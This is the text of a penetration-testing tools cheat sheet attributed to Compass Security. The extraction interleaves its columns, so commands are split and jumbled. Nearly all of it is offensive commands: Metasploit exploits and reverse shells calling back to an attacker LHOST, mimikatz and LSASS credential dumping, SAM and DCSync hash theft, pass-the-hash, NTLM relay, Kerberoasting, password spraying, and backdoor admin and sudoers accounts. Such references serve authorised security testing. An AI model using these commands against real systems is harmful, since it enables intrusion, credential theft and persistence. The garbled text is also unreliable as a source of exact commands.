Hacking Tools Cheat Sheet 2023
Hacking Tools Cheat Sheet 2023
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 1
Vulnerability DBs and Exploits msf > sessions 2 # interact Windows Privilege Escalation Scan for network shares:
meterpreter > sysinfo # use it $ [Link] --host-file [Link] -u
Exploit search (local copy of the Exploit-DB): Bypass PowerShell execution policy:
$ searchsploit apache File exchange / execute binary: PS > Set-ExecutionPolicy -Policy
Administrator -p PasswordOrHash
meterpreter > upload [Link] bypass -Scope process
Show exploit file path and copy it into clipboard: meterpreter > download c:\[Link] Windows Credentials Gathering
$ searchsploit -p 40142 meterpreter > execute -i -f /your/bin Use AMSI bypasses from [Link].
Start Mimikatz and create log file:
Online vulnerability and exploit databases: Port forwarding to localhost: Check for common privesc techniques: C:\> [Link]
▪ [Link], [Link], meterpreter > portfwd add -l 2323 -p ▪ GitHub carlospolop/PEASS-ng → winPEAS mimikatz # log C:\tmp\[Link]
[Link] 3389 -r [Link] ▪ GitHub itm4n/PrivescCheck
mimikatz # privilege::debug
Background Meterpreter session: ▪ GitHub PowerShellMafia/PowerSploit → Show passwords/hashes of logged in users:
Cracking meterpreter > background mimikatz# sekurlsa::logonpasswords
PowerUp.ps1
Online brute force SSH passwords: Pivoting through existing Meterpreter session: Dump [Link] using taskmgr or:
Exploit WSUS updates delivered via HTTP:
# ncrack -p 22 --user root -P msf > use post/multi/manage/autoroute PS > (Get-Process -Name lsass).Id
$ pywsus --host [Link] --port 8530
[Link] [Link]/24 msf > set session 2 # meterpreter sess PS > [Link] -accepteula -ma
--executable /opt/[Link] --
Determine hash type: msf > run <pid> c:\[Link]
command '/accepteula /s [Link] /c
# hashid 869d[...]bd88 msf > route PS > [Link]
"[Link] -encodedCommand J[…]"'
C:\windows\System32\[Link]
Show example hash types for hashcat: SOCKS via Meterpreter (requires autoroute): Add new local admin to persist after privesc: MiniDump <pid> C:\[Link] full
$ hashcat --example-hashes msf > use auxiliary/server/socks4a C:\> net user backdoor hunter2
msf > set SRVPORT 8080 Read LSASS process dump:
Crack hashes (e.g. type 1000 for NTLM): C:\> net localgroup Administrators
msf > run mimikatz# sekurlsa::minidump [Link]
$ hashcat -m 1000 -a 0 [Link] -r backdoor /add
$ pypykatz lsa minidump [Link]
[Link] /opt/wordlists/* Configure ProxyChains: Add AV exclusion:
# vi /etc/[Link] Dump LSASS remotely:
Crack hashes using John the Ripper: PS > Add-MpPreference -ExclusionPath
[...] $ lsassy -u admin -H e8[…]97 hostname
$ john --wordlist=[Link] [Link] C:\tmp\
socks4 [Link] 1080 Export SYSTEM & SAM hive for local users:
Metasploit Framework Connect through SOCKS proxy: Active Directory C:\> reg save HKLM\SYSTEM [Link]
# proxychains ncat [Link] 2305 C:\> reg save HKLM\SAM [Link]
Start Metasploit, search & use exploit: Start process with network credentials:
C:\> runas /netonly Dump hashes from SYSTEN & SAM file:
# msfconsole Linux Privilege Escalation mimikatz# lsadump::sam
msf > search eternalblue /user:[Link]\alice [Link]
msf > use exploit/windows/smb/ms17_… Check for common privesc techniques: Analyze AD & create report using PingCastle:
/system:[Link] /sam:[Link]
$ [Link] -sam [Link] -system
msf exploit(…) > show options ▪ GitHub carlospolop/PEASS-ng → linPEAS C:\> [Link] --healthcheck -- [Link] local
msf exploit(…) > set TARGET [Link] ▪ GitHub rebootuser/LinEnum explore-trust --explore-forest-trust
msf exploit(…) > exploit Dump local user hashes remotely:
▪ GTFOBins: [Link] --no-enum-limit
$ [Link]
Generate reverse shell (WAR): Set SUID bit to shell and start root shell: Gather BloodHound data using SharpHound: [Link]/alice:hunter2@hostname
$ msfvenom -p # chmod +s $(which sh) C:\> [Link] -c $ crackmapexec -u admin --local-auth
java/jsp_shell_reverse_tcp LHOST=<your $ sh -p All,GPOLocalGroup -H :01[…]D03 [Link]/24 –sam
ip address> LPORT=443 -f war > [Link]
Add SUDO backdoor user: Query AD using PowerView: DCSync:
Reverse shell listener: # echo "user ALL=(ALL:ALL) NOPASSWD: PS > Import-Module PowerView.ps1 $ [Link] -just-dc -just-dc-
msf > use exploit/multi/handler ALL" >> /etc/sudoers.d/README PS > Get-Domain user alice [Link]/admin:s3cret@dc
msf > set payload PS > Get-DomainUser mimikatz # lsadump::dcsync /user:alice
linux/x64/shell_reverse_tcp PS > Get-DomainTrust
Lateral Movement Linux
msf > set LHOST [Link] # attacker PS > Get-DomainComputer Pass-the-Hash
msf > set LPORT 443 Sniff SSH passwords: PS > Get-DomainController
msf > exploit # strace -p "$(pgrep -f PS > Get-DomainGroupMember -Recurse Remote shell:
Upgrade to Meterpreter: /usr/sbin/sshd)" -f -e trace=write -Identity "Domain Admins" $ [Link] -hashes :23[…]05
background # or press Ctrl-Z ^Z SSH agent hijacking: domain/username@[Link]
background session 1? [y/N] y # export SSH_AUTH_SOCK=/tmp/ssh…/agent Network Shares Alternatives: [Link], [Link].
msf > sessions # list sessions # ssh-add -l Search for juicy files on domain joined systems:
msf > sessions -u 1 # upgrade C:\> [Link] -s -o [Link]
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, [Link] 2
Access shares: mimikatz# misc::spooler misc::spooler S4U2Self (machine account to local admin): Remove certificate to cleanup:
$ [Link] -hashes :23[…]05 /connect:victim /server:attacker C:\> [Link] asktgt /nowrap C:\> [Link] clean /target:alice
[Link]/alice@[Link] Coerce via PetitPotam (EFS remote protocol): /domain:[Link] /user:"MYHOST$"
Spray hash over a subnet: $ [Link] -u alice -p hunter2 -d /aes256:23[...]05 Active Directory Certificate Services
[Link] attacker victim C:\> [Link] s4u /self /nowrap
$ crackmapexec smb [Link]/24 -u
/impersonateuser:domainadmin List CAs & find vulnerable templates:
alice -d [Link] -H 23[…]05 mimikatz# misc::efs /connect:victim C:\> [Link] cas
/server:attacker /altservice:cifs/[Link]
Enable restricted admin mode: /ticket:doI[…]= C:\> [Link] find /vulnerable
PS > New-ItemProperty -Path Coerce using multiple different techniques: Request certificate with specified subject:
HKLM:\System\CurrentControlSet\Control $ [Link] coerce -u alice -p Kerberoasting C:\> [Link] request
\Lsa -Name DisableRestrictedAdmin hunter2 --target victim --listener-ip /ca:[Link]\CA /template:ESC1
-Value 0 -PropertyType DWORD -Force attacker Get users with SPN: /altname:bob /install
PS > Get-DomainUser -SPN
RDP (requires restricted admin mode): Use certificate to get Kerberos ticket:
Password Spraying Kerberoast (hashcat mode 13100):
$ xfreerdp /u:alice /d:[Link] C:\> [Link] asktgt /ptt /user:bob
/pth:23[…]05 /v:[Link] Display password policy: C:\> [Link] kerberoast /certificate:[Link] /password:hunter2
C:\> net accounts /domain /outfile:[Link]
RDP using mimikatz: /domain:[Link] /dc:[Link]
mimikatz# sekurlsa::pth /user:alice Password spraying for all domain users: Get users which do not require preauth: NTLM relay to HTTP enrollment endpoint:
/domain:[Link] /ntlm: 23[…]05 C:\> [Link] brute /password:s3cret PS > Get-DomainUser -UACFilter $ [Link] -t
/run:"[Link] /restrictedadmin" DONT_REQ_PREAUTH
Password spraying for certain users: [Link]
C:\> [Link] brute /users:[Link] AS-REP roast (hashcat mode 18200): -smb2support --adcs --template Machine
NTLM Relay /passwords:[Link] C:\> [Link] asreproast
Vulnerable if message signing disabled: $ kerbrute passwordspray --dc [Link] /format:hashcat /outfile:[Link] MS SQL
# nmap -n -Pn -p 445 --script smb- -d [Link] [Link] hunter2 Use PowerUpSQL & get instances:
security-mode [Link]/24 Kerberos Delegation
PS > Import-Module PowerUpSQL.ps1
Kerberos Get unconstrained delegation systems:
Generate relay list: PS > $t = Get-SQLInstanceDomain | Get-
$ crackmapexec smb [Link]/24 --gen- List Kerberos tickets: PS > Get-DomainComputer -Unconstrained SQLConnectionTest | ? { $_.Status -eq
relay-list [Link] C:\> klist Watch for forwardable tickets: "Accessible" }; $t
Disable SMB and HTTP in [Link] and C:\> [Link] klist C:\> [Link] monitor /interval:10 Get information & vulnerabilities:
C:\> [Link] triage /nowrap PS > $t | Get-SQLServerInfo
start Responder for LLMNR/NBT-NS poisoning:
# responder -I eth0 Dump Kerberos keys: Coerce DC, import ticket & DCSync to privesc. PS > $t | Invoke-SQLAudit -v